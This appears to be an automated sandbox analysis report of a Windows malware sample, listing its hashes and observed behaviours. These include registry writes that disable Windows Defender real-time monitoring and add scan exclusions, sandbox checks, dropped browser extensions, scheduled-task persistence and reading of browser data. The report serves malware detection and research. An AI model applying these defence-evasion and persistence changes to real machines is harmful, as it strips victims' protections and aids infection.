Analysis
max time kernel: 121s
max time network: 127s
platform: windows7_x64
resource: win7-20231023-en
resource tags: arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
submitted: 07-12-2023 17:28
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20231023-en
General
Target: file.exe
Size: 7.3MB
MD5: 0faa4d38e65ff7e0f1e8134efa1895cf
SHA1: 3a6acf2ca9b32c2db7d7cc57becf0f1a78865e18
SHA256: b1522b1aa5051f824a40e3ef61466b52a7bb5ba84572f3c581990b08b2155e6b
SHA512: b55e479d6b078038b2e1ba768ee4a934d4c7d7fc85e0c56e0dc1f682828d7a80618462b0663d7cd3b11cb3b3c36ead638415baaa83cedb0812502ca7c4a802a3
SSDEEP: 196608:91OnB0vWiQDyndQdhiuIhU535GPCLsTzoNL:3On+OiQDyn6i9hU535Vw3oNL
Malware Config
Signatures
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
24 | 2496 | rundll32.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Control Panel\International\Geo\Nation | DSWBkkp.exe
Executes dropped EXE 4 IoCs
Processes:
pid | process
2804 | Install.exe
2684 | Install.exe
1080 | ycRIbyo.exe
1712 | DSWBkkp.exe
Loads dropped DLL 12 IoCs
Processes:
pid | process
2412 | file.exe
2804 | Install.exe
2804 | Install.exe
2804 | Install.exe
2804 | Install.exe
2684 | Install.exe
2684 | Install.exe
2684 | Install.exe
2496 | rundll32.exe
2496 | rundll32.exe
2496 | rundll32.exe
2496 | rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | DSWBkkp.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | DSWBkkp.exe
Drops file in System32 directory 21 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DSWBkkp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 | DSWBkkp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | DSWBkkp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 | DSWBkkp.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | DSWBkkp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B | DSWBkkp.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | ycRIbyo.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | ycRIbyo.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DSWBkkp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | DSWBkkp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B | DSWBkkp.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | ycRIbyo.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 | DSWBkkp.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | DSWBkkp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 | DSWBkkp.exe
Drops file in Program Files directory 13 IoCs
Processes:
description | ioc | process
File created | C:\Program Files (x86)\icEyDogKU\YfJxcM.dll | DSWBkkp.exe
File created | C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\tkDoewx.xml | DSWBkkp.exe
File created | C:\Program Files (x86)\yczsUHdtPuMxC\uGNaqiB.xml | DSWBkkp.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | DSWBkkp.exe
File created | C:\Program Files (x86)\yczsUHdtPuMxC\MXQdvMG.dll | DSWBkkp.exe
File created | C:\Program Files (x86)\bJazgiTXFJUn\fTCczcQ.dll | DSWBkkp.exe
File created | C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\JNqXQRZ.dll | DSWBkkp.exe
File created | C:\Program Files (x86)\ycMZCyUlVfbU2\ZYjfJJaxfcmMe.dll | DSWBkkp.exe
File created | C:\Program Files (x86)\ycMZCyUlVfbU2\cPywBfa.xml | DSWBkkp.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | DSWBkkp.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | DSWBkkp.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | DSWBkkp.exe
File created | C:\Program Files (x86)\icEyDogKU\UsAnVhq.xml | DSWBkkp.exe
Drops file in Windows directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\bQrKcOXclPyMmQgfTY.job | schtasks.exe
File created | C:\Windows\Tasks\NDmpcgCvNfyvVRxht.job | schtasks.exe
File created | C:\Windows\Tasks\NplADKkCBziqQHN.job | schtasks.exe
File created | C:\Windows\Tasks\yWyixlOEsLxsTwFTt.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
1504 | schtasks.exe
2480 | schtasks.exe
1452 | schtasks.exe
1472 | schtasks.exe
2548 | schtasks.exe
656 | schtasks.exe
2552 | schtasks.exe
2704 | schtasks.exe
2488 | schtasks.exe
888 | schtasks.exe
1640 | schtasks.exe
2364 | schtasks.exe
2380 | schtasks.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\c2-9b-b4-98-ec-4e | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | DSWBkkp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecisionReason = "1" | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | DSWBkkp.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDetectedUrl | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | DSWBkkp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | DSWBkkp.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadNetworkName = "Network 2" | DSWBkkp.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | rundll32.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecisionTime = 80250b033329da01 | rundll32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadDecisionReason = "1" | DSWBkkp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecisionTime = 80250b033329da01 | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | DSWBkkp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | DSWBkkp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadDecision = "0" | DSWBkkp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | DSWBkkp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | rundll32.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadDecisionTime = 80250b033329da01 | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | DSWBkkp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecision = "0" | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecision = "0" | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | DSWBkkp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | DSWBkkp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141} | DSWBkkp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | DSWBkkp.exe
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
pid | process
2904 | powershell.EXE
2904 | powershell.EXE
2904 | powershell.EXE
1256 | powershell.EXE
1256 | powershell.EXE
1256 | powershell.EXE
2868 | powershell.EXE
2868 | powershell.EXE
2868 | powershell.EXE
1232 | powershell.EXE
1232 | powershell.EXE
1232 | powershell.EXE
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
1712 | DSWBkkp.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2904 | powershell.EXE
Token: SeDebugPrivilege | 1256 | powershell.EXE
Token: SeDebugPrivilege | 2868 | powershell.EXE
Token: SeDebugPrivilege | 1232 | powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 2412 wrote to memory of 2804 | 2412 | file.exe | Install.exe
PID 2412 wrote to memory of 2804 | 2412 | file.exe | Install.exe
PID 2412 wrote to memory of 2804 | 2412 | file.exe | Install.exe
PID 2412 wrote to memory of 2804 | 2412 | file.exe | Install.exe
PID 2412 wrote to memory of 2804 | 2412 | file.exe | Install.exe
PID 2412 wrote to memory of 2804 | 2412 | file.exe | Install.exe
PID 2412 wrote to memory of 2804 | 2412 | file.exe | Install.exe
PID 2804 wrote to memory of 2684 | 2804 | Install.exe | Install.exe
PID 2804 wrote to memory of 2684 | 2804 | Install.exe | Install.exe
PID 2804 wrote to memory of 2684 | 2804 | Install.exe | Install.exe
PID 2804 wrote to memory of 2684 | 2804 | Install.exe | Install.exe
PID 2804 wrote to memory of 2684 | 2804 | Install.exe | Install.exe
PID 2804 wrote to memory of 2684 | 2804 | Install.exe | Install.exe
PID 2804 wrote to memory of 2684 | 2804 | Install.exe | Install.exe
PID 2684 wrote to memory of 2700 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2700 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2700 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2700 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2700 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2700 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2700 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2580 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2580 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2580 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2580 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2580 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2580 | 2684 | Install.exe | forfiles.exe
PID 2684 wrote to memory of 2580 | 2684 | Install.exe | forfiles.exe
PID 2700 wrote to memory of 2708 | 2700 | forfiles.exe | cmd.exe
PID 2700 wrote to memory of 2708 | 2700 | forfiles.exe | cmd.exe
PID 2700 wrote to memory of 2708 | 2700 | forfiles.exe | cmd.exe
PID 2700 wrote to memory of 2708 | 2700 | forfiles.exe | cmd.exe
PID 2700 wrote to memory of 2708 | 2700 | forfiles.exe | cmd.exe
PID 2700 wrote to memory of 2708 | 2700 | forfiles.exe | cmd.exe
PID 2700 wrote to memory of 2708 | 2700 | forfiles.exe | cmd.exe
PID 2580 wrote to memory of 2492 | 2580 | forfiles.exe | cmd.exe
PID 2580 wrote to memory of 2492 | 2580 | forfiles.exe | cmd.exe
PID 2580 wrote to memory of 2492 | 2580 | forfiles.exe | cmd.exe
PID 2580 wrote to memory of 2492 | 2580 | forfiles.exe | cmd.exe
PID 2580 wrote to memory of 2492 | 2580 | forfiles.exe | cmd.exe
PID 2580 wrote to memory of 2492 | 2580 | forfiles.exe | cmd.exe
PID 2580 wrote to memory of 2492 | 2580 | forfiles.exe | cmd.exe
PID 2708 wrote to memory of 2644 | 2708 | cmd.exe | reg.exe
